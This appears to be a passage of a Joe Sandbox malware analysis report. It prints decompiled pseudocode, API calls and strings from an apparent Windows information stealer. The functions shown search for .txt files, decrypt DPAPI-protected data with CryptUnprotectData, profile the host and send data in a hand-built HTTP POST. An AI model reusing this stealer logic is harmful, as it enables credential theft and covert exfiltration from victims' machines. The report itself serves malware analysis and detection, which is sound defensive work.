						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
						_pop(_t141);
						 *[fs:eax] = _t141;
					}
				} while (FindNextFileW(_v24,  &_v616) != 0);
				FindClose(_v24);
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(E004117E6);
				E00403B98( &_v664, 2);
				E004034E4( &_v656);
				E00403B98( &_v652, 4);
				E004034E4( &_v636);
				E00403B98( &_v632, 4);
				return E00403B98( &_v16, 3);
			}


























                                                                      0x00411590
                                                                      0x00411590
                                                                      0x00411590
                                                                      0x00411591
                                                                      0x00411593
                                                                      0x00411594
                                                                      0x00411599
                                                                      0x00411599
                                                                      0x0041159b
                                                                      0x0041159d
                                                                      0x0041159d
                                                                      0x004115a0
                                                                      0x004115a0
                                                                      0x004115a3
                                                                      0x004115a4
                                                                      0x004115a5
                                                                      0x004115a6
                                                                      0x004115a9
                                                                      0x004115ac
                                                                      0x004115b2
                                                                      0x004115ba
                                                                      0x004115c2
                                                                      0x004115c9
                                                                      0x004115ca
                                                                      0x004115cf
                                                                      0x004115d2
                                                                      0x004115ea
                                                                      0x00411600
                                                                      0x00411603
                                                                      0x00411603
                                                                      0x00411606
                                                                      0x0041161c
                                                                      0x00411621
                                                                      0x00411627
                                                                      0x00411637
                                                                      0x0041163c
                                                                      0x0041164d
                                                                      0x0041165f
                                                                      0x00411667
                                                                      0x00411668
                                                                      0x0041166d
                                                                      0x00411670
                                                                      0x00411673
                                                                      0x00411676
                                                                      0x0041168c
                                                                      0x00411691
                                                                      0x00411697
                                                                      0x004116a7
                                                                      0x004116ac
                                                                      0x004116bd
                                                                      0x004116ce
                                                                      0x004116df
                                                                      0x004116ea
                                                                      0x004116eb
                                                                      0x004116ee
                                                                      0x004116f3
                                                                      0x004116f6
                                                                      0x0041170c
                                                                      0x00411711
                                                                      0x00411717
                                                                      0x00411727
                                                                      0x00411738
                                                                      0x00411743
                                                                      0x00411744
                                                                      0x0041174b
                                                                      0x0041174e
                                                                      0x0041174e
                                                                      0x0041176d
                                                                      0x00411779
                                                                      0x00411780
                                                                      0x00411783
                                                                      0x00411786
                                                                      0x00411796
                                                                      0x004117a1
                                                                      0x004117b1
                                                                      0x004117bc
                                                                      0x004117cc
                                                                      0x004117de

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                      • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                      • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstFreeNextString
                                                                      • String ID: .txt$\*.*
                                                                      • API String ID: 2008072091-2615687548
                                                                      • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                      • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                      • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                      • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 16%
                                                                      			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v36;
				intOrPtr _v40;

				_t19 = __ecx;
				_v20 = __edx;
				_v16 = __eax;
				_push( &_v12);
				_push(1);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v20);
				if( *0x41c7c8() == 0) {
					return E00403538(__ecx, E0040952C);
				}
				E004036DC(__ecx, _v36);
				E00403AC0(_t19, _v40);
				return LocalFree(_v36);
			}








                                                                      0x004094c8
                                                                      0x004094ca
                                                                      0x004094cd
                                                                      0x004094d5
                                                                      0x004094d6
                                                                      0x004094d8
                                                                      0x004094da
                                                                      0x004094dc
                                                                      0x004094de
                                                                      0x004094e4
                                                                      0x004094ed
                                                                      0x00000000
                                                                      0x00409518
                                                                      0x004094f5
                                                                      0x00409500
                                                                      0x00000000

                                                                      APIs
                                                                      • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                      • LocalFree.KERNEL32(?), ref: 0040950A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CryptDataFreeLocalUnprotect
                                                                      • String ID:
                                                                      • API String ID: 1561624719-0
                                                                      • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                      • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                                                                      • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                      • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 51%
                                                                      			E00404B4C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x404bb2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00403748( &_v20, 7,  &_v15);
				E00402988(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00404BB9);
				return E004034E4( &_v20);
			}








                                                                      0x00404b55
                                                                      0x00404b5a
                                                                      0x00404b5b
                                                                      0x00404b60
                                                                      0x00404b63
                                                                      0x00404b72
                                                                      0x00404b82
                                                                      0x00404b8d
                                                                      0x00404b98
                                                                      0x00404b98
                                                                      0x00404b9e
                                                                      0x00404ba1
                                                                      0x00404ba4
                                                                      0x00404bb1

                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                      • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                                                                      • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                      • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407A34 Relevance: .0, Instructions: 2COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00407A34() {

				return  *[fs:0x30];
			}



                                                                      0x00407a3b

                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                      • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                      • Instruction Fuzzy Hash:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418124 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t144;
				void* _t151;
				void* _t186;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x418535);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t196 = LoadLibraryA(E004039E8( &_v28));
				}
				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404EE4(2, 2));
					if( *0x41c89c() == 0) {
						_t225 =  *0x41c8a4(2, 1, 0);
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41c8a0(E00403990(_v8));
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41c8b0(_a8);
								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D2C( &_v1480, _v1484);
									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D2C( &_v1492, _a12);
									E00403E1C();
									E0040377C( &_v20, _v1476);
									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41c8b8(_t225);
									_push( &_v24);
									_push(E00403A78(0x418680, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E0041853C);
				E00403B98( &_v1492, 2);
				E004034E4( &_v1484);
				E00403B98( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}





























                                                                      0x00418131
                                                                      0x00418137
                                                                      0x0041813d
                                                                      0x00418143
                                                                      0x00418149
                                                                      0x0041814f
                                                                      0x00418152
                                                                      0x00418155
                                                                      0x00418158
                                                                      0x0041815b
                                                                      0x0041815e
                                                                      0x00418161
                                                                      0x00418167
                                                                      0x0041816f
                                                                      0x00418177
                                                                      0x0041817f
                                                                      0x00418187
                                                                      0x0041818e
                                                                      0x0041818f
                                                                      0x00418194
                                                                      0x00418197
                                                                      0x004181a2
                                                                      0x004181b5
                                                                      0x004181b9
                                                                      0x004181c9
                                                                      0x004181c9
                                                                      0x004181dd
                                                                      0x004181f4
                                                                      0x0041820b
                                                                      0x00418222
                                                                      0x00418239
                                                                      0x00418250
                                                                      0x00418267
                                                                      0x0041827e
                                                                      0x00418285
                                                                      0x004182f6
                                                                      0x00418301
                                                                      0x0041830b
                                                                      0x00418314
                                                                      0x00418326
                                                                      0x0041832b
                                                                      0x00418331
                                                                      0x00418343
                                                                      0x0041834b
                                                                      0x00418358
                                                                      0x00418369
                                                                      0x0041837a
                                                                      0x00418380
                                                                      0x00418382
                                                                      0x004183c9
                                                                      0x004183da
                                                                      0x004183f3
                                                                      0x0041840c
                                                                      0x00418422
                                                                      0x00418430
                                                                      0x0041844a
                                                                      0x00418453
                                                                      0x00418458
                                                                      0x0041845b
                                                                      0x0041846d
                                                                      0x00418487
                                                                      0x00418494
                                                                      0x0041849f
                                                                      0x004184a4
                                                                      0x004184a9
                                                                      0x004184b2
                                                                      0x004184c3
                                                                      0x004184c7
                                                                      0x004184d1
                                                                      0x004184d2
                                                                      0x004184dd
                                                                      0x004184dd
                                                                      0x00418382
                                                                      0x0041834b
                                                                      0x0041832b
                                                                      0x00418314
                                                                      0x004184e4
                                                                      0x004184e7
                                                                      0x004184ea
                                                                      0x004184fa
                                                                      0x00418505
                                                                      0x00418515
                                                                      0x00418522
                                                                      0x00418534

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                                                                      • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                                                                      • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                                                                      • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                                                                      • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                                                                      • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                                                                      • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                                                                      • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                                                                      • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                                      • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                      • API String ID: 384173800-3355491746
                                                                      • Opcode ID: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
                                                                      • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                                                                      • Opcode Fuzzy Hash: 447bc90b094ad6630a41df1a26737c259296e5cff920802da588b0ecfe34b4d8
                                                                      • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed char _t59;
				intOrPtr* _t60;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t173;
				void* _t181;
				intOrPtr _t184;
				intOrPtr _t185;

				_t182 = __esi;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				asm("das");
				 *_t59 =  *_t59 + _t59;
				 *__edx =  *__edx + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 & _t59;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 +  *_t59;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t184 = _t185;
				_t143 = 0xc;
				do {
					_push(0);
					_push(0);
					_t143 = _t143 - 1;
					_t191 = _t143;
				} while (_t143 != 0);
				_t142 = _t60;
				_push(_t184);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t142, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t142, _t181, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t191);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v40);
				E004037DC( &_v68, "Screen: ",  *_t142);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v60);
				_push( *_t142);
				_push("Layouts: ");
				E00416FB8( &_v80, _t142, _t181, _t182);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("LocalTime: ");
				E00417198( &_v84, _t142, _t182);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("Zone: ");
				E00417098( &_v88, _t142, _t181, _t182, _t191);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				E00416748( &_v92, _t142, _t181, _t182);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t142);
				E00416B94( &_v96, _t142, _t181, _t182, _t191);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t142);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t142, _t181, _t182);
				E00403798(_t142, _v100);
				_t173 = 0x4175a8;
				 *[fs:eax] = _t173;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}



































                                                                      0x00417278
                                                                      0x00417278
                                                                      0x0041727a
                                                                      0x0041727c
                                                                      0x0041727d
                                                                      0x0041727f
                                                                      0x00417281
                                                                      0x00417283
                                                                      0x00417284
                                                                      0x00417286
                                                                      0x00417288
                                                                      0x0041728a
                                                                      0x0041728e
                                                                      0x00417291
                                                                      0x00417293
                                                                      0x00417298
                                                                      0x00417298
                                                                      0x0041729a
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x0041729c
                                                                      0x004172a0
                                                                      0x004172a4
                                                                      0x004172a5
                                                                      0x004172aa
                                                                      0x004172ad
                                                                      0x004172b0
                                                                      0x004172b8
                                                                      0x004172bd
                                                                      0x004172c0
                                                                      0x004172cc
                                                                      0x004172d1
                                                                      0x004172d3
                                                                      0x004172dd
                                                                      0x004172e2
                                                                      0x004172e5
                                                                      0x004172f1
                                                                      0x004172f6
                                                                      0x004172f8
                                                                      0x00417300
                                                                      0x00417305
                                                                      0x00417308
                                                                      0x00417315
                                                                      0x00417320
                                                                      0x00417325
                                                                      0x0041732b
                                                                      0x00417330
                                                                      0x00417333
                                                                      0x0041733b
                                                                      0x00417340
                                                                      0x00417343
                                                                      0x00417350
                                                                      0x0041735a
                                                                      0x00417369
                                                                      0x00417374
                                                                      0x00417379
                                                                      0x0041737f
                                                                      0x00417384
                                                                      0x00417387
                                                                      0x0041738f
                                                                      0x00417394
                                                                      0x00417397
                                                                      0x0041739c
                                                                      0x004173a9
                                                                      0x004173b3
                                                                      0x004173c2
                                                                      0x004173cd
                                                                      0x004173d2
                                                                      0x004173df
                                                                      0x004173e4
                                                                      0x004173e7
                                                                      0x004173f6
                                                                      0x004173fb
                                                                      0x004173fe
                                                                      0x0041740b
                                                                      0x00417415
                                                                      0x0041741a
                                                                      0x0041741c
                                                                      0x00417424
                                                                      0x00417429
                                                                      0x0041742c
                                                                      0x00417438
                                                                      0x0041743d
                                                                      0x0041743f
                                                                      0x00417447
                                                                      0x0041744c
                                                                      0x0041744f
                                                                      0x0041745b
                                                                      0x00417460
                                                                      0x00417462
                                                                      0x0041746a
                                                                      0x0041746f
                                                                      0x00417472
                                                                      0x0041747e
                                                                      0x00417483
                                                                      0x00417488
                                                                      0x0041748d
                                                                      0x00417490
                                                                      0x0041749c
                                                                      0x004174a3
                                                                      0x004174a8
                                                                      0x004174ad
                                                                      0x004174b2
                                                                      0x004174b5
                                                                      0x004174ba
                                                                      0x004174c6
                                                                      0x004174cd
                                                                      0x004174d2
                                                                      0x004174d4
                                                                      0x004174e5
                                                                      0x004174ec
                                                                      0x004174f4
                                                                      0x004174fe
                                                                      0x00417505
                                                                      0x00417508
                                                                      0x0041750b
                                                                      0x00417518
                                                                      0x00417525
                                                                      0x0041752d
                                                                      0x0041753a
                                                                      0x00417542
                                                                      0x0041754f
                                                                      0x0041755c
                                                                      0x00417569
                                                                      0x0041757b

                                                                      APIs
                                                                      • GetSystemMetrics.USER32 ref: 004173D7
                                                                      • GetSystemMetrics.USER32 ref: 004173EE
                                                                        • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                      • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                        • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                        • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                      • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                      • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                        • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                        • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                        • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                      • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                      • API String ID: 75899496-943277980
                                                                      • Opcode ID: 58f48ea636e9adab74f2cff82e6aa2b28564f4d77c9b80aafec4ee121c4b5d26
                                                                      • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                      • Opcode Fuzzy Hash: 58f48ea636e9adab74f2cff82e6aa2b28564f4d77c9b80aafec4ee121c4b5d26
                                                                      • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 43%
                                                                      			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t59;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr _t172;
				void* _t180;
				intOrPtr _t183;
				intOrPtr _t184;

				_t181 = __esi;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__edx =  *__edx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax & __eax;
				 *__eax =  *__eax + __eax;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				_t183 = _t184;
